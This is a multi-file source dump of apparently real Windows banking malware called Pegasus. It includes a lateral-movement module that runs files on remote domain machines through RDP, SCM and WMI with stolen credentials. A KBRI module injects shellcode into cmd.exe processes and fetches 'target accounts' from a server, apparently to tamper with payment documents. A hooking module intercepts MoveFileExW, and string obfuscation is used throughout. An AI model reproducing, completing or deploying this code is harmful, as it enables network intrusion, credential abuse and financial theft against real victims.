-------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | Source Files 6 | 7 | 8 | Source Files\libs 9 | 10 | 11 | Source Files\libs 12 | 13 | 14 | Source Files\libs 15 | 16 | 17 | Source Files 18 | 19 | 20 | Source Files\incs 21 | 22 | 23 | Source Files\incs 24 | 25 | 26 | Source Files\libs 27 | 28 | 29 | Source Files\libs 30 | 31 | 32 | Source Files\libs 33 | 34 | 35 | 36 | 37 | Header Files 38 | 39 | 40 | Header Files 41 | 42 | 43 | Header Files\libs 44 | 45 | 46 | Header Files\libs 47 | 48 | 49 | Header Files\libs 50 | 51 | 52 | Header Files 53 | 54 | 55 | Header Files\incs 56 | 57 | 58 | Header Files\incs 59 | 60 | 61 | Header Files\libs 62 | 63 | 64 | Header Files\libs 65 | 66 | 67 | Header Files\libs 68 | 69 | 70 | Header Files 71 | 72 | 73 | Header Files 74 | 75 | 76 | 77 | 78 | {e9874ae9-5322-4bf1-90b7-053fe676066c} 79 | 80 | 81 | {626d82b2-93ec-4885-ae5c-9e4a3067f6b9} 82 | 83 | 84 | {aa96f6c4-8d23-4164-a305-97ed9717fd8e} 85 | 86 | 87 | {096d18db-ef92-41b5-bef2-bf2e48da28fc} 88 | 89 | 90 | {f41dc97e-2f8a-444c-8cd6-25b3b3784da6} 91 | 92 | 93 | {68a8556c-6033-494b-981f-27c34db729ca} 94 | 95 | 96 | -------------------------------------------------------------------------------- /Pegasus/mod_CmdExec/mod_CmdExec.h: -------------------------------------------------------------------------------- 1 | /* 2 | mod_CmdExec.h 3 | */ 4 | 5 | #pragma once 6 | 7 | #include 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | -------------------------------------------------------------------------------- /Pegasus/mod_DomainReplication/DomainReplication.h: -------------------------------------------------------------------------------- 1 | /* 2 | DomainReplication.h 3 | Headers file 4 | */ 5 | #pragma once 6 | 7 | #include 8 | #include 9 | 10 | // action type for drConnection() function 11 | typedef enum DRA_TYPE { 12 | DRA_CONNECT = 1, 13 | DRA_DISCONNECT 14 | }; 15 | 16 | // resource name for drConnection() function 17 | 
typedef enum DRR_TYPE { 18 | DRR_NULL_SESSION = 1, 19 | DRR_ADMIN_SHARE, 20 | DRR_C_SHARE, 21 | DRR_SPECIFIED = 255 22 | }; 23 | 24 | typedef struct _DR_ACCESS_VARS 25 | { 26 | BOOL bInited; // indicates this structure was properly inited, to check if deinit needed 27 | 28 | // sid-related vars 29 | 30 | PSID pEveryoneSID; 31 | EXPLICIT_ACCESS ea[1]; 32 | PACL pACL; 33 | PSECURITY_DESCRIPTOR pSD; 34 | 35 | // result 36 | SECURITY_ATTRIBUTES sa; 37 | 38 | } DR_ACCESS_VARS, *PDR_ACCESS_VARS; 39 | 40 | VOID infStartDomainReplication(); 41 | 42 | BOOL drInitEveryoneREsa(DR_ACCESS_VARS *dav); 43 | VOID drFreeEveryoneREsa(DR_ACCESS_VARS *dav); -------------------------------------------------------------------------------- /Pegasus/mod_DomainReplication/RDP.cpp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DeadNumbers/Pegasus/f83159ebcc2b2ba429b23805fdc66ab3eb2959f5/Pegasus/mod_DomainReplication/RDP.cpp -------------------------------------------------------------------------------- /Pegasus/mod_DomainReplication/RDP.h: -------------------------------------------------------------------------------- 1 | /* 2 | RDP.h 3 | */ 4 | 5 | #include 6 | 7 | BOOL rdpAttemptReplication(LPWSTR wszTargetMachine, LPWSTR wszUsername, LPWSTR wszPassword); -------------------------------------------------------------------------------- /Pegasus/mod_DomainReplication/SCM.h: -------------------------------------------------------------------------------- 1 | /* 2 | SCM.h 3 | */ 4 | 5 | #include 6 | 7 | // params passed from _drRemoteServiceAsync() to it's child thread _drthrRemoteService() 8 | typedef struct _REMSRV_THREAD_PARAMS 9 | { 10 | // input params 11 | LPWSTR wszTargetMachine; 12 | LPWSTR wszRemoteFilename; 13 | 14 | // sync object 15 | HANDLE hThreadStarted; // event object signalled when thread's init done and it's safe to wait for hSyncObject 16 | HANDLE hSyncObject; // event signalled when caller may exit, 
indicating remote file is possibly running or some error occured. Cleanup is done by thread internally anyway 17 | HANDLE hCallerExited; // set by caller when it terminates and thread may dispose params structure safely 18 | 19 | // result output 20 | BOOL bResult; 21 | 22 | } REMSRV_THREAD_PARAMS, *PREMSRV_THREAD_PARAMS; 23 | 24 | BOOL scmStartRemoteFileAsServiceAsync(LPWSTR wszTargetMachine, LPWSTR wszRemoteFilename); -------------------------------------------------------------------------------- /Pegasus/mod_DomainReplication/WMI.h: -------------------------------------------------------------------------------- 1 | /* 2 | WMI.h 3 | */ 4 | 5 | #include 6 | 7 | 8 | #ifdef __cplusplus 9 | extern "C" { 10 | #endif 11 | 12 | BOOL wmiStartRemoteProcess(LPWSTR wszTargetMachine, LPWSTR wszRemoteFilename, LPWSTR wszUsername, LPWSTR wszPassword); 13 | 14 | #ifdef __cplusplus 15 | } 16 | #endif -------------------------------------------------------------------------------- /Pegasus/mod_DomainReplication/mod_DomainReplication.c: -------------------------------------------------------------------------------- 1 | /* 2 | mod_DomainReplication.c 3 | Main file for module DomainReplication 4 | NB: configuration of this project defines ROUTINES_BY_PTR, so all libs will use definition of a ptr instead of code itself, 5 | and it is essential to perform proper initialization of all pointers, received from main (core) module 6 | 7 | */ 8 | 9 | 10 | // perform essential compiler settings 11 | // remove stdlib 12 | #pragma comment(linker, "/NODEFAULTLIB:libcmt.lib") 13 | #pragma comment(linker, "/NODEFAULTLIB:MSVCRT.lib") 14 | #pragma comment(linker, "/NODEFAULTLIB:MSVCRTD.lib") 15 | #pragma comment(linker, "/NODEFAULTLIB:libcmtd.lib") 16 | 17 | 18 | #include 19 | 20 | #include "..\inc\dbg.h" 21 | #include "..\shared\ModuleAPI.h" 22 | 23 | #include "DomainReplication.h" 24 | 25 | 26 | 27 | 28 | 29 | #if defined(_M_X64) 30 | // x64 system libs 31 | #pragma comment (lib, 
"..\\lib\\amd64\\BufferOverflowU.lib") 32 | #pragma comment (lib, "..\\lib\\amd64\\ntdll.lib") 33 | #elif defined(_M_IX86) 34 | // x32 system libs 35 | #pragma comment (lib, "..\\lib\\i386\\BufferOverflowU.lib") 36 | #pragma comment (lib, "..\\lib\\i386\\ntdll.lib") 37 | #else 38 | #error Unknown target CPU, no system libs can be found 39 | #endif 40 | 41 | 42 | 43 | #include "mod_DomainReplication.h" 44 | 45 | /* 46 | Imports init function, should contain calls to ALL modules which is used by internal calls (reference build output to check 47 | which modules are compiled in ROUTINES_BY_PTR when particular module is being build) 48 | */ 49 | BOOL modInitImports(CORE_APIS *pCoreAPIs) 50 | { 51 | BOOL bRes = TRUE; // ok by default 52 | 53 | HashedStrings_resolve(pCoreAPIs->HashedStrings_apis); 54 | // PipeWorks_resolve(pCoreAPIs->PipeWorks_apis); // direct use here 55 | DomainListMachines_resolve(pCoreAPIs->DomainListMachines_apis); 56 | CredManager_resolve(pCoreAPIs->CredManager_apis); 57 | EmbeddedResources_resolve(pCoreAPIs->EmbeddedResources_apis); 58 | MyStringRoutines_resolve(pCoreAPIs->MyStringRoutines_apis); 59 | CryptoStrings_resolve(pCoreAPIs->CryptoStrings_apis); 60 | RndClass_resolve(pCoreAPIs->RndClass_apis); 61 | // MailslotWorks_resolve(pCoreAPIs->MailslotWorks_apis); // is really used? 62 | // DataCallbackManager_resolve(pCoreAPIs->DataCallbackManager_apis); // is really used? 
63 | 64 | return bRes; 65 | } 66 | 67 | /* 68 | Routine to be execute when all init are finished 69 | */ 70 | DWORD WINAPI thrModuleRun(LPVOID lpParameter) 71 | { 72 | DbgPrint("entered"); 73 | 74 | infStartDomainReplication(); 75 | 76 | DbgPrint("finished"); 77 | 78 | return 0; 79 | } 80 | 81 | 82 | 83 | // entrypoint function for module 84 | BOOL WINAPI DllEntry(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved) 85 | { 86 | BOOL bRes = TRUE; // need return TRUE to proceed next 87 | CORE_APIS *pCoreAPIs = (CORE_APIS *)lpvReserved; 88 | DWORD dwThreadId; 89 | 90 | if (fdwReason == DLL_PROCESS_ATTACH) { 91 | 92 | DbgPrint("DLL_PROCESS_ATTACH: entered"); 93 | 94 | // do apis init in ALL used modules 95 | modInitImports(pCoreAPIs); 96 | 97 | // start work thread 98 | CloseHandle(CreateThread(NULL, 0, thrModuleRun, NULL, 0, &dwThreadId)); 99 | 100 | DbgPrint("DLL_PROCESS_ATTACH: done"); 101 | 102 | } // DLL_PROCESS_ATTACH 103 | 104 | return bRes; 105 | } 106 | 107 | 108 | 109 | 110 | 111 | 112 | -------------------------------------------------------------------------------- /Pegasus/mod_DomainReplication/mod_DomainReplication.h: -------------------------------------------------------------------------------- 1 | /* 2 | mod_DomainReplication.h 3 | */ 4 | 5 | #pragma once 6 | 7 | #include 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | -------------------------------------------------------------------------------- /Pegasus/mod_KBRI/KBRI.cpp: -------------------------------------------------------------------------------- 1 | /* 2 | KBRI.cpp 3 | Main routines file 4 | */ 5 | 6 | #include 7 | #include 8 | 9 | #include "..\inc\dbg.h" 10 | #include "..\inc\mem.h" 11 | #include "..\inc\HashedStrings.h" 12 | #include "..\inc\MyStringRoutines.h" 13 | 14 | #include "..\inc\EmbeddedResources.h" 15 | #include "..\Shellcode\shellcode.h" 16 | 17 | #include "kbriInject.h" 18 | #include "kbriList.h" 19 | #include "kbriController.h" 20 | #include 
"kbriTargetAccManager.h" 21 | #include "kbriDataParser.h" 22 | 23 | #include "KBRI.h" 24 | 25 | 26 | 27 | // module's globals 28 | KBRI_GLOBALS gKBRI; 29 | 30 | 31 | 32 | /* 33 | enums all running processes to find cmd.exe and attempt to call injection function for it 34 | */ 35 | #define KBRIA_RND_XOR STRHASH_PARAM(0x2e555d24997b6c7) 36 | VOID kbriScanInjectCmdProcess() 37 | { 38 | HANDLE hSnap = INVALID_HANDLE_VALUE; 39 | PROCESSENTRY32 pe = { 0 }; 40 | 41 | //DbgPrint("entered"); 42 | 43 | do { // not a loop 44 | 45 | // before scan, set a special flag in all saved items to remove non-existent processes later 46 | kbriClearScannedFlag(&gKBRI.list); 47 | 48 | hSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); 49 | if (hSnap == INVALID_HANDLE_VALUE) { DbgPrint("ERR: CreateToolhelp32Snapshot() failed, code %p", GetLastError()); break; } 50 | 51 | pe.dwSize = sizeof(PROCESSENTRY32); 52 | if (!Process32First(hSnap, &pe)) { DbgPrint("ERR: Process32First() failed, le %p", GetLastError()); break; } 53 | 54 | do { 55 | 56 | // process pe structure 57 | sr_lowercase(pe.szExeFile); 58 | if ((HashStringW_const(pe.szExeFile) ^ KBRIA_RND_XOR) == (HASHSTR_CONST("cmd.exe", 0x3eaf098d3e434b1a) ^ KBRIA_RND_XOR)) { 59 | 60 | // add while checking if such pid not exist yet 61 | // ALSO, adds scanned flag in case of duplicate pid 62 | if (kbriAddInjectedPid(&gKBRI.list, pe.th32ProcessID)) { 63 | 64 | DbgPrint("detected cmd process pid %u", pe.th32ProcessID); 65 | 66 | kbriAttemptInject(pe.th32ProcessID); 67 | 68 | } // dup check 69 | 70 | } // hash check 71 | 72 | } while (Process32Next(hSnap, &pe)); 73 | 74 | // all done 75 | CloseHandle(hSnap); 76 | 77 | // remove from list items, not found during last scan 78 | kbriRemoveNotScanned(&gKBRI.list); 79 | 80 | } while (FALSE); // not a loop 81 | } 82 | 83 | 84 | 85 | /* 86 | Starts a thread to monitor / inject into target processes 87 | NB: we have max 5 sec after target cmd script start to perform injection before it starts 
working 88 | */ 89 | VOID kbriStartInjMonitor() 90 | { 91 | 92 | // init globals 93 | memset(&gKBRI, 0, sizeof(KBRI_GLOBALS)); 94 | kbriInitList(&gKBRI.list); 95 | 96 | kdpInit(); 97 | 98 | // engage controller pipe server 99 | kcStartController(&gKBRI); 100 | 101 | // start server communication thread to periodically request t-accs updates 102 | tamStartTAccsQueryThread(&gKBRI); 103 | 104 | // start scan 105 | do { 106 | 107 | kbriScanInjectCmdProcess(); 108 | 109 | #ifndef _DEBUG 110 | Sleep(15000); 111 | #else 112 | Sleep(3000); 113 | #endif 114 | 115 | } while (TRUE); // infinite loop 116 | 117 | } -------------------------------------------------------------------------------- /Pegasus/mod_KBRI/KBRI.h: -------------------------------------------------------------------------------- 1 | /* 2 | KBRI.h 3 | */ 4 | #pragma once 5 | #include 6 | 7 | #include "kbriList.h" 8 | 9 | 10 | 11 | 12 | 13 | // all globals var used by module, in a single structure 14 | typedef struct _KBRI_GLOBALS 15 | { 16 | KBRI_LIST list; // linked list of injected processes 17 | 18 | DWORD dwPipeServerThreadId; // tid of pipe server thread, needed when other version requests termination 19 | DWORD dwTAccsQueryThreadId; // kbriTargetAccManager.cpp, thread to periodically issue special server request 20 | 21 | } KBRI_GLOBALS, *PKBRI_GLOBALS; 22 | 23 | 24 | VOID kbriStartInjMonitor(); -------------------------------------------------------------------------------- /Pegasus/mod_KBRI/kbriController.h: -------------------------------------------------------------------------------- 1 | /* 2 | kbriController.h 3 | */ 4 | 5 | #include 6 | 7 | #include "KBRI.h" 8 | 9 | BOOL kcStartController(KBRI_GLOBALS *KBRI); -------------------------------------------------------------------------------- /Pegasus/mod_KBRI/kbriDataParser.cpp: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/DeadNumbers/Pegasus/f83159ebcc2b2ba429b23805fdc66ab3eb2959f5/Pegasus/mod_KBRI/kbriDataParser.cpp -------------------------------------------------------------------------------- /Pegasus/mod_KBRI/kbriDataParser.h: -------------------------------------------------------------------------------- 1 | /* 2 | kbriDataParser.h 3 | */ 4 | 5 | #include 6 | 7 | #include "kbriTargetAccManager.h" 8 | 9 | 10 | // globals for this module 11 | typedef struct _KDP_GLOBALS 12 | { 13 | 14 | TARGACCS_LIST tal; 15 | 16 | } KDP_GLOBALS, *PKDP_GLOBALS; 17 | 18 | 19 | // structure to pass params from kdpParseData() to kdpParseDataInt() 20 | typedef struct _PD_PARAMS 21 | { 22 | LPVOID pBuffer; 23 | DWORD dwBufferLen; 24 | LPVOID *pResBuffer; 25 | DWORD *dwResBufferLen; 26 | 27 | BOOL bRes; // processing function's result 28 | 29 | } PD_PARAMS, *PPD_PARAMS; 30 | 31 | BOOL kdpParseData(LPVOID pBuffer, DWORD dwBufferLen, LPVOID *pResBuffer, DWORD *dwResBufferLen); 32 | VOID kdpInit(); -------------------------------------------------------------------------------- /Pegasus/mod_KBRI/kbriGeneratePurpose.cpp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DeadNumbers/Pegasus/f83159ebcc2b2ba429b23805fdc66ab3eb2959f5/Pegasus/mod_KBRI/kbriGeneratePurpose.cpp -------------------------------------------------------------------------------- /Pegasus/mod_KBRI/kbriGeneratePurpose.h: -------------------------------------------------------------------------------- 1 | /* 2 | kbriGeneratePurpose.h 3 | */ 4 | 5 | #include 6 | 7 | BOOL kgpGeneratePurpose(LPSTR *pszResult, UINT64 i64Sum); -------------------------------------------------------------------------------- /Pegasus/mod_KBRI/kbriInject.h: -------------------------------------------------------------------------------- 1 | /* 2 | kbriInject.h 3 | */ 4 | #pragma once 5 | #include 6 | 7 | 8 | #pragma pack(push) 9 | #pragma pack(1) 10 | 11 | #if 
defined(_M_X64) 12 | 13 | // x64 shellcode entry trampouline 14 | typedef struct _JumpCode 15 | { 16 | WORD wMovRcxOpcode; // param 17 | ULONGLONG ulParam; 18 | 19 | WORD wMovRaxOpcode; // jump addr 20 | ULONGLONG ulExecAddr; 21 | 22 | WORD wJmpRaxOpcode; 23 | 24 | } JumpCode, *PJumpCode; 25 | #else 26 | 27 | // x32 shellcode entry trampouline 28 | typedef struct _JumpCode 29 | { 30 | 31 | 32 | BYTE bPushOpcode1; // param 33 | DWORD dwParam; 34 | 35 | BYTE bPushOpcode2; 36 | DWORD dwRetAddr; // addr to assume return after all routines finished (essential for proper stack access by shellcode) 37 | 38 | BYTE bPushOpcode3; // exec addr 39 | DWORD dwExecAddr; 40 | 41 | BYTE bRetOpcode; 42 | 43 | } JumpCode, *PJumpCode; 44 | 45 | #endif 46 | 47 | #pragma pack(pop) // restore previous alignment settings 48 | 49 | BOOL kbriPrepareInjBuffer(LPVOID *pResBuffer, DWORD *dwResBufferLen, DWORD *dwShellcodeEntryOffset, DWORD *dwShellcodeLen); 50 | BOOL kbriPatchInjBufferOffsets(LPVOID pBuffer, LPVOID pTargetMemPtr, DWORD dwShellcodeEntryOffset, DWORD dwShellcodeLen); 51 | BOOL kbriAttemptInject(DWORD dwTargetPID); -------------------------------------------------------------------------------- /Pegasus/mod_KBRI/kbriList.cpp: -------------------------------------------------------------------------------- 1 | /* 2 | kbriList.cpp 3 | Misc linked list - related routines 4 | */ 5 | 6 | #include 7 | 8 | #include "..\inc\dbg.h" 9 | #include "..\inc\mem.h" 10 | 11 | #include "kbriList.h" 12 | 13 | VOID kbriInitList(KBRI_LIST *list) 14 | { 15 | memset(list, 0, sizeof(KBRI_LIST)); 16 | InitializeCriticalSection(&list->csipAccess); 17 | } 18 | 19 | /* 20 | Try to add a pid to list. 
If pid a new - returns TRUE 21 | In case of duplicate pid, returns FALSE 22 | ALSO, adds scanned flag in case of duplicate pid 23 | */ 24 | BOOL kbriAddInjectedPid(KBRI_LIST *list, DWORD dwPID) 25 | { 26 | BOOL bRes = TRUE; 27 | INJECTED_PROCESS_CHUNK *chunk; // moving ptr with current chunk 28 | 29 | // scan existent items 30 | if (list->dwipCount) { 31 | 32 | EnterCriticalSection(&list->csipAccess); 33 | 34 | // get first item 35 | chunk = list->ipHead.lcNext; 36 | 37 | while (chunk) { 38 | 39 | // check contents 40 | if (chunk->er.dwPID == dwPID) { /* DbgPrint("pid %u already injected", dwPID); */ bRes = FALSE; chunk->er.bScanned = TRUE; break; } 41 | 42 | // move to next item 43 | chunk = chunk->lcNext; 44 | } 45 | 46 | LeaveCriticalSection(&list->csipAccess); 47 | 48 | // check if found pid 49 | if (!bRes) { return bRes; } 50 | 51 | } else { DbgPrint("no items yet"); } // items present 52 | 53 | // really add a new pid record 54 | chunk = (INJECTED_PROCESS_CHUNK *)my_alloc(sizeof(INJECTED_PROCESS_CHUNK)); 55 | chunk->er.dwPID = dwPID; 56 | chunk->er.bScanned = TRUE; 57 | 58 | // link to list 59 | EnterCriticalSection(&list->csipAccess); 60 | chunk->lcNext = list->ipHead.lcNext; 61 | list->ipHead.lcNext = chunk; 62 | list->dwipCount++; 63 | DbgPrint("added new item, new count %u", list->dwipCount); 64 | LeaveCriticalSection(&list->csipAccess); 65 | 66 | return bRes; 67 | } 68 | 69 | 70 | /* 71 | Iterate all items and clear scanned flag 72 | */ 73 | VOID kbriClearScannedFlag(KBRI_LIST *list) 74 | { 75 | INJECTED_PROCESS_CHUNK *chunk; // moving ptr with current chunk 76 | 77 | // check for no items 78 | if (!list->dwipCount) { return; } 79 | 80 | EnterCriticalSection(&list->csipAccess); 81 | 82 | // get first item 83 | chunk = list->ipHead.lcNext; 84 | 85 | while (chunk) { 86 | 87 | // set value 88 | chunk->er.bScanned = FALSE; 89 | 90 | // move to next item 91 | chunk = chunk->lcNext; 92 | } 93 | 94 | LeaveCriticalSection(&list->csipAccess); 95 | } 96 | 97 | /* 
98 | Iterate chunk list and remove all items where no bScanned flag currently set 99 | */ 100 | VOID kbriRemoveNotScanned(KBRI_LIST *list) 101 | { 102 | INJECTED_PROCESS_CHUNK *chunk; // moving ptr with current chunk 103 | INJECTED_PROCESS_CHUNK *chunk_prev; 104 | 105 | // check for no items 106 | if (!list->dwipCount) { return; } 107 | 108 | EnterCriticalSection(&list->csipAccess); 109 | 110 | // get first item 111 | chunk_prev = &list->ipHead; 112 | chunk = list->ipHead.lcNext; 113 | 114 | while (chunk) { 115 | 116 | // check flag 117 | if (!chunk->er.bScanned) { 118 | 119 | DbgPrint("removing pid %u as non-running", chunk->er.dwPID); 120 | 121 | // found not-set flag, unlink chunk 122 | chunk_prev->lcNext = chunk->lcNext; 123 | list->dwipCount--; 124 | 125 | // dealloc 126 | my_free(chunk); 127 | 128 | // move to next item 129 | chunk = chunk_prev->lcNext; 130 | 131 | } else { 132 | 133 | // move to next item 134 | chunk_prev = chunk_prev->lcNext; 135 | chunk = chunk->lcNext; 136 | 137 | } 138 | } 139 | 140 | LeaveCriticalSection(&list->csipAccess); 141 | 142 | 143 | } -------------------------------------------------------------------------------- /Pegasus/mod_KBRI/kbriList.h: -------------------------------------------------------------------------------- 1 | /* 2 | kbriList.h 3 | */ 4 | #pragma once 5 | #include 6 | 7 | // structure describing a single item of injected process 8 | typedef struct _INJECTED_PROCESS 9 | { 10 | DWORD dwPID; // pid of process injected (or at least attempted to) 11 | BOOL bScanned; // flag used while re-enuming processes list, to remove non-existent processes after re-scan 12 | 13 | } INJECTED_PROCESS, *PINJECTED_PROCESS; 14 | 15 | 16 | // single chunk pointer by linked list 17 | typedef struct _INJECTED_PROCESS_CHUNK INJECTED_PROCESS_CHUNK; 18 | typedef struct _INJECTED_PROCESS_CHUNK 19 | { 20 | INJECTED_PROCESS_CHUNK *lcNext; 21 | INJECTED_PROCESS er; // NB: payload in head item is not used 22 | 23 | } INJECTED_PROCESS_CHUNK, 
*PINJECTED_PROCESS_CHUNK; 24 | 25 | typedef struct _KBRI_LIST 26 | { 27 | INJECTED_PROCESS_CHUNK ipHead; // list head for a list of injected processes 28 | DWORD dwipCount; // amount of ^ 29 | CRITICAL_SECTION csipAccess; // cs to guard access to a list 30 | 31 | } KBRI_LIST, *PKBRI_LIST; 32 | 33 | VOID kbriInitList(KBRI_LIST *list); 34 | BOOL kbriAddInjectedPid(KBRI_LIST *list, DWORD dwPID); 35 | VOID kbriClearScannedFlag(KBRI_LIST *list); 36 | VOID kbriRemoveNotScanned(KBRI_LIST *list); -------------------------------------------------------------------------------- /Pegasus/mod_KBRI/kbriTargetAccManager.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DeadNumbers/Pegasus/f83159ebcc2b2ba429b23805fdc66ab3eb2959f5/Pegasus/mod_KBRI/kbriTargetAccManager.h -------------------------------------------------------------------------------- /Pegasus/mod_KBRI/mod_KBRI.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | Source Files 6 | 7 | 8 | Source Files\libs 9 | 10 | 11 | Source Files\libs 12 | 13 | 14 | Source Files\libs 15 | 16 | 17 | Source Files 18 | 19 | 20 | Source Files\incs 21 | 22 | 23 | Source Files\incs 24 | 25 | 26 | Source Files\libs 27 | 28 | 29 | Source Files\libs 30 | 31 | 32 | Source Files\libs 33 | 34 | 35 | 36 | 37 | Header Files 38 | 39 | 40 | Header Files 41 | 42 | 43 | Header Files\libs 44 | 45 | 46 | Header Files\libs 47 | 48 | 49 | Header Files\libs 50 | 51 | 52 | Header Files 53 | 54 | 55 | Header Files\incs 56 | 57 | 58 | Header Files\incs 59 | 60 | 61 | Header Files\libs 62 | 63 | 64 | Header Files\libs 65 | 66 | 67 | Header Files\libs 68 | 69 | 70 | Header Files 71 | 72 | 73 | Header Files 74 | 75 | 76 | 77 | 78 | {e9874ae9-5322-4bf1-90b7-053fe676066c} 79 | 80 | 81 | {626d82b2-93ec-4885-ae5c-9e4a3067f6b9} 82 | 83 | 84 | {aa96f6c4-8d23-4164-a305-97ed9717fd8e} 85 | 86 | 87 | {096d18db-ef92-41b5-bef2-bf2e48da28fc} 88 | 
89 | 90 | {f41dc97e-2f8a-444c-8cd6-25b3b3784da6} 91 | 92 | 93 | {68a8556c-6033-494b-981f-27c34db729ca} 94 | 95 | 96 | -------------------------------------------------------------------------------- /Pegasus/mod_KBRI/mod_KBRI.h: -------------------------------------------------------------------------------- 1 | /* 2 | mod_KBRI.h 3 | */ 4 | 5 | #pragma once 6 | 7 | #include 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | -------------------------------------------------------------------------------- /Pegasus/mod_KBRI_hd/APIHook.h: -------------------------------------------------------------------------------- 1 | /* 2 | APIHook.h 3 | Headers file 4 | */ 5 | 6 | #include 7 | 8 | 9 | // max size of stub code in bytes 10 | #if defined(_M_X64) 11 | // x64 12 | #define HOOK_STUB_MAXLEN 45 13 | #define MIN_STUB_LEN 12 14 | #else 15 | // x32 16 | #define HOOK_STUB_MAXLEN 20 17 | #define MIN_STUB_LEN 5 18 | #endif 19 | 20 | 21 | 22 | void patch_function(LPVOID address, unsigned char *stub, unsigned char *hook, DWORD *stub_len); 23 | BOOL hkHook(HMODULE hModule, LPSTR szFunctionName, LPVOID pHook, LPVOID pStub, LPVOID *pToCallOrig); -------------------------------------------------------------------------------- /Pegasus/mod_KBRI_hd/KBRI_hd.h: -------------------------------------------------------------------------------- 1 | /* 2 | KBRI_hd.h 3 | */ 4 | 5 | #include 6 | 7 | // description of hooked functions 8 | typedef BOOL(WINAPI *f_MoveFileExW)(LPCWSTR lpExistingFileName, LPCWSTR lpNewFileName, DWORD dwFlags); 9 | 10 | // global vars structure 11 | typedef struct _KHD_GLOBALS 12 | { 13 | LPVOID pStubs; // buffer to hold all the stubs. 
Ptrs to call orig funcs will point here 14 | 15 | // hook stubs to call original function, ptrs to some place at pStubs 16 | f_MoveFileExW p_MoveFileExW; 17 | 18 | } KHD_GLOBALS, *PKHD_GLOBALS; 19 | 20 | 21 | 22 | 23 | VOID khdSetHooks(); -------------------------------------------------------------------------------- /Pegasus/mod_KBRI_hd/khdProcessing.h: -------------------------------------------------------------------------------- 1 | /* 2 | khdProcessing.h 3 | */ 4 | 5 | #include 6 | 7 | BOOL kpCheckFile(LPCWSTR wszExistingFilename, LPVOID *pNewData, DWORD *dwNewDataLen, FILETIME *ftC, FILETIME *ftA, FILETIME *ftW); -------------------------------------------------------------------------------- /Pegasus/mod_KBRI_hd/ldasm.h: -------------------------------------------------------------------------------- 1 | #ifndef _LDASM_ 2 | #define _LDASM_ 3 | 4 | //#include "defines.h" 5 | #include 6 | 7 | #define F_INVALID 0x01 8 | #define F_PREFIX 0x02 9 | #define F_REX 0x04 10 | #define F_MODRM 0x08 11 | #define F_SIB 0x10 12 | #define F_DISP 0x20 13 | #define F_IMM 0x40 14 | #define F_RELATIVE 0x80 15 | 16 | #define uint8_t BYTE 17 | #define uint32_t DWORD 18 | 19 | typedef struct _ldasm_data { 20 | uint8_t flags; 21 | uint8_t rex; 22 | uint8_t modrm; 23 | uint8_t sib; 24 | uint8_t opcd_offset; 25 | uint8_t opcd_size; 26 | uint8_t disp_offset; 27 | uint8_t disp_size; 28 | uint8_t imm_offset; 29 | uint8_t imm_size; 30 | } ldasm_data; 31 | 32 | /* 33 | Description: 34 | Disassemble one instruction 35 | 36 | Arguments: 37 | code - pointer to the code for disassemble 38 | ld - pointer to structure ldasm_data 39 | is64 - set this flag for 64-bit code, and clear for 32-bit 40 | 41 | Return: 42 | length of instruction 43 | */ 44 | unsigned int ldasm(void *code, ldasm_data *ld, uint32_t is64); 45 | 46 | #endif /* _LDASM_ */ 47 | -------------------------------------------------------------------------------- /Pegasus/mod_KBRI_hd/mod_KBRI_hd.c: 
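--------------------------------------------------------------------------------
/*
	mod_KBRI_hd.c
	Main file for module KBRI_hd
	NB: stand-alone dll with all modules compiled locally (no ROUTINES_BY_PTR)

*/


// perform essential compiler settings
// remove stdlib
#pragma comment(linker, "/NODEFAULTLIB:libcmt.lib")
#pragma comment(linker, "/NODEFAULTLIB:MSVCRT.lib")
#pragma comment(linker, "/NODEFAULTLIB:MSVCRTD.lib")
#pragma comment(linker, "/NODEFAULTLIB:libcmtd.lib")


#include <windows.h>

#include "..\inc\dbg.h"
#include "..\inc\mem.h"
#include "..\shared\ModuleAPI.h"

// internal code modules
#include "KBRI_hd.h"


#if defined(_M_X64)
	// x64 system libs
	#pragma comment (lib, "..\\lib\\amd64\\BufferOverflowU.lib")
	#pragma comment (lib, "..\\lib\\amd64\\ntdll.lib")
#elif defined(_M_IX86)
	// x32 system libs
	#pragma comment (lib, "..\\lib\\i386\\BufferOverflowU.lib")
	#pragma comment (lib, "..\\lib\\i386\\ntdll.lib")
#else
	#error Unknown target CPU, no system libs can be found
#endif


#include "mod_KBRI_hd.h"


/*
	Single-instance guard for this module inside the host process.

	The mutex name is decrypted at runtime (CRSTRW) and released with my_free
	before returning, so it is never kept in the clear.

	Returns TRUE when the named mutex did not exist yet: it is created here
	with initial ownership and the handle is intentionally left open for the
	remainder of the process lifetime, which keeps the name reserved while
	the hooks are installed. Returns FALSE when another instance already owns
	the name, or when the mutex could not be created at all (uniqueness can
	then not be proven, so the caller should not install hooks again).

	Why a single CreateMutex + GetLastError() check replaces the former
	OpenMutex-then-CreateMutex pair: that sequence was not atomic (two
	instances attaching concurrently could both miss on OpenMutex and both
	report TRUE), and a successful OpenMutex leaked its handle.
*/
BOOL kbAreUniq()
{
	BOOL bRes = FALSE;
	LPWSTR wszName;
	HANDLE hMutex;

	wszName = CRSTRW("pg0DB75F67E1DBEF", "\xfc\xff\xd1\x02\xec\xff\xc1\x0d\xbc\xc3\x13\xbd\x59\x21\x47\x9d\x09\x76\x55\x88\x69\x61\xbb");

	// atomic create-or-open: an existing object is reported through the last error
	hMutex = CreateMutex(NULL, TRUE, wszName);

	if (hMutex) {

		if (GetLastError() == ERROR_ALREADY_EXISTS) {
			// another instance owns the name; we did not get ownership, drop our extra reference
			CloseHandle(hMutex);
		} else {
			// first instance: hMutex is deliberately kept open (process-lifetime guard)
			bRes = TRUE;
		}

	} else {
		DbgPrint("ERR: CreateMutex failed, le=%u", GetLastError());
	}

	my_free(wszName);

	return bRes;
}


// entrypoint function for module
// called as separate thread in context of a target remote process
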